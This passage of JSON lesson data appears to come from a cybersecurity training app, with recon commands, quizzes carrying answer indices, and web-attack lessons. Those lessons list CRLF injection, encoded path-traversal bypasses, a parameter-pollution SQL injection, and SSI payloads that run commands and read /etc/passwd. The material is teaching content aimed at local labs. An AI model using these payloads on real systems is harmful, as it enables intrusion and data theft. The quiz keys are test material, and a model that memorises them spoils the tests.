Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Removed secrets are still findable because...","opts":["They're cached","Git history preserves every committed version","They're backed up","DNS records them"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1}]},{"id":"r-email-security-check","cat":"Reconnaissance","title":"Email Security Assessment","diff":4,"xp":250,"intro":"Assess an organization's email security posture without sending a single email.","sections":[{"type":"text","content":"Check SPF strictness, DKIM key strength, DMARC enforcement, MTA-STS, and BIMI. Weak email security = spoofable domain."},{"type":"code","lang":"bash","content":"# Full email security check\ndig txt target.com | grep spf  # ~all vs -all?\ndig txt _dmarc.target.com  # p=none vs p=reject?\ndig txt _mta-sts.target.com  # MTA-STS?\ndig txt default._bimi.target.com  # BIMI?\n# Check DKIM key length\ndig txt selector._domainkey.target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SPF ending with ~all (tilde) means...","opts":["Hard fail (reject)","Soft fail (mark but accept)","Neutral","Pass all"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-source-code-recon","cat":"Reconnaissance","title":"Source Code Reconnaissance","diff":3,"xp":200,"intro":"Analyze publicly available source code for architectural insights.","sections":[{"type":"text","content":"Open-source components, leaked code, or public repos reveal: internal naming conventions, API structure, dependency versions, and deployment patterns."},{"type":"code","lang":"bash","content":"# Search for the target's code\ngithub-search 'org:target internal'\n# Analyze dependencies for known vulns\ngrep -r 'require|import' repo/ | sort -u\n# Check for .env.example files\nfind repo/ -name '.env*' -o -name 'config.example.*'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Source code recon reveals...","opts":["Nothing useful","Architecture, dependencies, and potential vulnerabilities","Physical locations","Employee salaries"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-network-device-fingerprint","cat":"Reconnaissance","title":"Network Device Fingerprinting","diff":4,"xp":250,"intro":"Identify routers, switches, and firewalls by their responses.","sections":[{"type":"text","content":"Network devices have distinctive banners, SNMP responses, and HTTP management interfaces. Identifying the exact model reveals known CVEs."},{"type":"code","lang":"bash","content":"nmap -sV -p 22,23,80,443,161 gateway_ip\nsnmpwalk -v2c -c public gateway_ip sysDescr\ncurl -sk https://gateway_ip | grep -iE 'cisco|juniper|paloalto|fortinet|sonicwall'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Network device fingerprinting helps find...","opts":["User passwords","Model-specific CVEs and default credentials","Email addresses","DNS records"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-bgp-hijack-detect","cat":"Reconnaissance","title":"BGP Hijack Detection","diff":5,"xp":300,"intro":"Detect when someone announces your IP prefixes without authorization.","sections":[{"type":"text","content":"BGP hijacking redirects traffic by announcing someone else's IP prefixes. Monitor with RPKI, BGP monitoring services, and route origin validation."},{"type":"code","lang":"bash","content":"# Check RPKI status\ncurl -s https://stat.ripe.net/data/rpki-validation/data.json?resource=AS12345&prefix=1.2.3.0/24\n# Monitor BGP announcements\ncurl -s https://api.bgpview.io/prefix/1.2.3.0/24\n# RPKI ROA creation\n# Create Route Origin Authorization at your RIR"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"BGP hijacking redirects traffic by...","opts":["DNS spoofing","Announcing someone else's IP prefixes via BGP","ARP spoofing","Port scanning"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"w-crlf-injection","cat":"Web Application","title":"CRLF Injection Attacks","diff":2,"xp":150,"intro":"Inject carriage return/line feed to manipulate HTTP headers.","sections":[{"type":"text","content":"CRLF (\\r\\n) in user input reflected in headers allows header injection, response splitting, and log poisoning."},{"type":"code","lang":"bash","content":"?param=value%0d%0aSet-Cookie:admin=true\n?param=value%0d%0aX-Injected:header\n# Response splitting\n?param=value%0d%0a%0d%0a<html>injected</html>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CRLF injection uses which characters?","opts":["< >","\\r\\n (carriage return + line feed)","\\t\\n","00"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"w-path-normalization","cat":"Web Application","title":"Path Normalization Bypass","diff":3,"xp":200,"intro":"Bypass security controls using path normalization differences.","sections":[{"type":"text","content":"Different components normalize paths differently: /admin/..%2f../secret may bypass a WAF checking for /secret but the backend resolves it correctly."},{"type":"code","lang":"bash","content":"# URL encoding bypass\n/admin/..%2f..%2fsecret\n# Double encoding\n/admin/..%252f..%252fsecret\n# Backslash (IIS)\n/admin/....secret\n# Null byte (old systems)\n/admin/../secret%00.jpg"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Path normalization attacks exploit...","opts":["Encryption","Different URL parsing between proxy/WAF and backend","DNS","Authentication"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0}]},{"id":"w-request-param-pollution","cat":"Web Application","title":"HTTP Parameter Pollution","diff":3,"xp":200,"intro":"Send duplicate parameters to bypass validation or cause logic errors.","sections":[{"type":"text","content":"When the same parameter appears multiple times (id=1&id=2), different technologies take different values: first, last, array, or comma-joined."},{"type":"code","lang":"bash","content":"# Bypass WAF: WAF checks first param, app uses last\n?id=1&id=2 UNION SELECT 1,2,3--\n# Or different parameter positions\nPOST /transfer\nfrom=attacker&to=victim&amount=100&from=victim"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HPP works because different technologies handle duplicates...","opts":["Identically","Differently (first, last, array, or comma-joined)","By rejecting them","By encrypting them"],"ans":1},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1}]},{"id":"w-server-side-include","cat":"Web Application","title":"Server-Side Include (SSI) Injection","diff":2,"xp":150,"intro":"Inject SSI directives to execute commands on legacy web servers.","sections":[{"type":"text","content":"SSI directives like <!--#exec cmd=\"id\"--> execute commands when the server processes .shtml files or has SSI enabled globally."},{"type":"code","lang":"bash","content":"# SSI injection payloads\n<!--#exec cmd=\"id\"-->\n<!--#exec cmd=\"cat /etc/passwd\"-->\n<!--#echo var=\"DOCUMENT_ROOT\"-->\n<!--#include virtual=\"/etc/passwd\"-->"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from 